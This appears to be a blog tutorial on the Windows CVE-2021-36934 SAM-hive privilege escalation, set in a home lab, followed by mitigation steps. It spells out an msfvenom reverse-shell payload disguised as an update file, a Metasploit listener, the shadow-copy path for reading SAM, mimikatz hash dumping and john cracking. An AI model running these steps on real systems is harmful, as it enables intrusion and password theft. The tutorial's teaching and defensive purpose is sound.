Windows Privilege Escalation - Offense and Defense!
Windows
Privilege Escalation
Prerequisites: A windows VM, A Linux attack box,
Empire/Metasploit for shell access (not demonstrated).
Vulnerability
Details
CVE-2021-36934
Windows 10 and Windows
11 are vulnerable to a local elevation of privilege vulnerability after
discovering that users with low privileges can access sensitive Registry
database files.
The database files
associated with the Windows Registry are stored under the
C:\Windows\system32\config folder and are broken up into different files such
as SYSTEM, SECURITY, SAM, DEFAULT, and SOFTWARE.
As these files contain
sensitive information about all user accounts on a device and security tokens
used by Windows features.
This is especially
true for Security account Manager (SAM) file as it contains the hashed
passwords for all users on a system, which threat actors can use to assume
their identity.
Environment
Setup
Setting
up a VM (windows 10) in VirtualBox:
Download VirtualBox client and install it
Download a fresh Image of Windows 10 from Microsoft’s
official Website.
https://www.microsoft.com/en-us/software-download/windows10
Install VirtualBox and install Windows 10 in it.
Setting
up a Kali Linux (Attack Box in Virtual Machine)
Download Kali Linux pre-made machine from offensive security’s
Website / Kali’s official Website:
https://www.offensive-security.com
Install it as well in the VirtualBox.
Creating
users in windows
Open your newly installed windows. You’ll be logged in as a
administrator by default. Create a low privileged user
Reference Screenshot:
After creating the user, log out and log in again as the
low privileged user.
Gaining Access from Attack Box
Open up Kali VM (the default username and password is
kali:kali) and launch Metasploit. (Make sure to update the repo to avoid
any error—sudo apt update && sudo apt upgrade)
Create a executable for windows with meterpreter:
msfvenom -p windows/meterpreter/reverse_tcp -a x86
–platform windows -f exe LHOST=<local-ip> LPORT=4444 -o /home/kali/update.listeners
Transfer this payload to windows and execute it.
Then go to msfconsole and start a listener:
Reference Screenshot:
Commands used:
- · msfconsole
- · use
exploit/multi/handler
- · set
payload windows/meterpreter/reverse/tcp
- · set
LHOST eth0
- · set
LPORT 4444
- · exploit
You’ll get a reverse
shell (cmd). For demonstration purpose
we used windows cmd.
Demonstration
Windows 10 and Windows
11 Registry files associated with the Security Account Manager (SAM), and
all other Registry databases, are accessible to the 'Users' group that has low
privileges on a device.
With these low file
permissions, a threat actor with limited privileges on a device can extract the
NTLM hashed passwords for all accounts on a device and use those hashes in
pass-the-hash attacks to gain elevated privileges.
As you can see, we can’t access the file. Since the file is
always being used by the OS. BUT, the registry files including SAM is always
backed up by windows Shadow volume copy. We can take advantage of that.
As a threat actor, we can use win32 device namespace path
for shadow volume copies to access the file.
\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM
(Enter this command in mimikatz to get all the
NTML hashes)
Getting NTML Hash
You should use mimikatz to perform this task to get NTML
hash of all the users on the machine including local_admin. Then compare the
hash against any wordlist eg:”rockyou.txt” to get the password.
Example command: john <hash_file> --wordlist /usr/share/wordlists/rockyou.txt
How to Prevent The Exploit
Currently there’s no patch for this
vulnerability. But, you can delete the shadow copies and restrict access to c:\system\config
Note: Delete the backuped up
shadow copies before restricting access to system\config.
Commands:
Deleting Shadow copies: vssadmin Delete Shadows/All
Restrict Access: icacls %windir%\system32\config\*.* /inheritance:e
Final Thoughts
So far, this vulnerability hasn’t been patched yet by
Microsoft. Security researchers suggest that every corporate business or local
businesses should do the mentioned steps and disable access to c:\windows\system32\config
folder for everyone but local administrator and domain admin and delete the
shadow backup copies to prevent this kind of situation.
Live demonstration?
ReplyDeleteI can comment.
ReplyDeleteonek valo hoiche vai😘
ReplyDelete